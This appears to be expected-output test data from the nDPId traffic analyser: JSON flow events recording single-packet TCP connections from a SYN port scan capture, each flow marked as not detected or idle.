-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9917,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9917,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5825,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5825,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9943,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9943,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9944,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9944,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5850,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1755,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5850,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 